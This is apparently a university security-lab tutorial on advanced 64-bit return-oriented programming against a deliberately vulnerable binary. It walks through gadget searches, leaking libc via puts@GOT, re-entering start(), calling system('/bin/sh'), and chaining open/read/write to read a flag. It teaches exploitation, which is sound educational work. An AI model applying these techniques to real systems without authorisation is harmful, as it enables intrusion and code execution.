Tut06: Advanced ROP

In the last tutorial, we leveraged the leaked code and stack pointers in our control hijacking attacks. In this tutorial, we will exploit the same program without having any information leak, but most importantly, in x86_64 (64-bit).

Step 0. Understanding the binary

$ checksec ./target
[*] '/home/lab06/tut06-advrop/target'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

DEP (NX) is enabled so pages not explicitly marked as executable are not executable, but PIE is not enabled, meaning that ASLR is not fully enabled and the target executable's image base is not randomized. Note that the libraries, heap and stack are still randomized. Fortunately, like the previous tutorial, the canary is not placed; it means that we can still smash the stack and hijack the very first control flow.

[Task] Your first task is to trigger a buffer overflow and control rip.

You can control rip with the following payload:

  [buf  ]
  [ra   ] -> func
  [.....] -> arg?

Step 1. Controlling arguments in x86_64

However, unlike x86, we can not control the arguments of the invoked function by overwriting the stack. Since the target binary is built for x86_64, rdi should instead contain the first argument.

In the last tutorial, we just used the pop; ret gadget for clearing up the stack, but this can be leveraged for controlling registers. For example, after executing pop rdi; ret, you are now controlling the value of a register (rdi = arg1) from the overwritten stack.

Let's control the argument with the following payload:

  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ]
  [ra   ] -> puts()
  [ra   ]

Since our binary is not PIE-enabled, we can still search gadgets in the code section.

  1. looking for the pop gadget.
$ ropper --file ./target --search "pop rdi; ret"
[INFO] File: ./target
0x0000000000400a03: pop rdi; ret;

What about puts() of the randomized libc?

  1. looking for puts().

Although the actual implementation of puts() is in the libc, we can still invoke puts() by using the resolved address stored in its GOT.

Do you remember how the program invoked an external function via PLT/GOT, like this? In other words, we can still invoke by jumping into the plt code of puts():

0x00000000004006a0 <puts@plt>:
+--0x4006a0: jmp    QWORD PTR [rip+0x200972] # GOT of puts()
| (first time)
+->0x4006a6: push   0x0                    # index of puts()
|  0x4006ab: jmp    0x400690 <.plt>        # resolve libc's puts()
| (once resolved)
+--> puts() @libc
0x0000000000400827 <start>:
   400896: call   0x4006a0 <puts@plt>

pwndbg also provides an easy way to look up plt routines in the binary:

pwndbg> plt
0x4006a0: puts@plt
0x4006b0: printf@plt
0x4006c0: memset@plt
0x4006d0: geteuid@plt
0x4006e0: read@plt
0x4006f0: strcmp@plt
0x400700: dlopen@plt
0x400710: setreuid@plt
0x400720: setvbuf@plt
0x400730: dlsym@plt

[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary read primitive.

Your payload should look like:

  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "Password OK :)"
  [ra   ] -> puts@plt
  [ra   ] (crashing)

Step 2. Leaking libc's code pointer

Although the process image has lots of interesting functions that we can abuse, it misses much powerful functions such as system() that allows us for arbitrary execution. To invoke arbitrary libc functions, we first need to leak code pointers pointing to the libc image.

Which part of the process image contains libc pointers? GOT! The below code is to bridge your invocation from puts@plt to the puts@libc by using the real address of puts() in GOT.

0x00000000004006a0 <puts@plt>:
   0x4006a0: jmp    QWORD PTR [rip+0x200972] # GOT of puts()

What's the address of puts@GOT? It's rip + 0x200972 so 0x4006a6 + 0x200972 = 0x601018 (rip pointing to the next instruction).

Again, pwndbg provides a convenient way to look up GOT of the binary as well.

pwndbg> got

GOT protection: Partial RELRO | GOT functions: 10
[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff78609c0 (puts) <- push r13
[0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7844e80 (printf) <- sub rsp, 0xd8

[Task] Let's leak the address of puts of libc!

Your payload should look like:

  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt
  [ra   ] (crashing)

Note that the output of puts() might not be 8 bytes (64-bit pointer), as its address contains multiple zeros (i.e., NULL-byte for puts()) in the most significant bytes.

Step 3. Preparing Second Payload

Now what? We can calculate the base of libc from the leaked puts(), so we can invoke all functions in libc? Perhaps, like below:

  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"@libc
  [ra   ] -> system()@libc
  [ra   ] (crashing)

In fact, when you are preparing the payload, you don't know the address of libc; the payload leaking the puts@GOT is not yet executed.

Among all the places we know, is there any place we can continue to interact with the process? Yes, the start() function! Our plan is to execute start(), resolve the address of libc, and smashing the stack once more.

[Task] Jump to start() that has the stack overflow. Make sure that you indeed see the program banner once more!


  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> puts@got
  [ra   ] -> puts@plt

  [ra   ] -> start

The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP once more to invoke system() with the resolved addresses.

[Task] Invoke system("/bin/sh")!


  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "/bin/sh"
  [ra   ] -> system@libc

Step 4. Advanced ROP: Chaining multiple functions!

Similar to the last tutorial, we will invoke a sequence of calls to read the flag.

(assume: symlinked anystring -> /proc/flag)

1) open("anystring", 0)
2) read(3, tmp, 1040)
3) write(1, tmp, 1040)
  1. Invoking open()

To control the second argument, we need a gadget that pops rsi (pointing to the second argument in x86_64) and returns.

$ ropper --file ./target --search 'pop rsi; ret'
<.. Nop ..>

Although the target binary doesn't have the pop rsi; ret but there is one effectively identical.

$ ropper --file ./target --search 'pop rsi; pop %; ret'
0x0000000000400a01: pop rsi; pop r15; ret;

So invoking open() is pretty doable:


  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> "anystring`

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> 0
  [dummy] (r15)
  [ra   ] -> open() 
  1. Invoking read()

To invoke read(), we need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have a proper gadget available.

What should we do? In fact, at this point, we know the address of the libc image and we can chain the rop by using its gadget!

$ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret'
0x0000000000001b96: pop rdx; ret;

Your payload should like this:


  [buf  ]
  [ra   ] -> pop rdi; ret
  [arg1 ] -> 3

  [ra   ] -> pop rsi; pop r15; ret
  [arg2 ] -> tmp
  [dummy] (r15)

  [ra   ] -> pop rdx; ret
  [arg3 ] -> 1040
  [ra   ] -> read()

[Task] Your final task is to chain open/read/write, and get the real flag from target-seccomp!

What if either PIE or ssp (stack canary) is enabled? Do you think we can exploit this vulnerability?
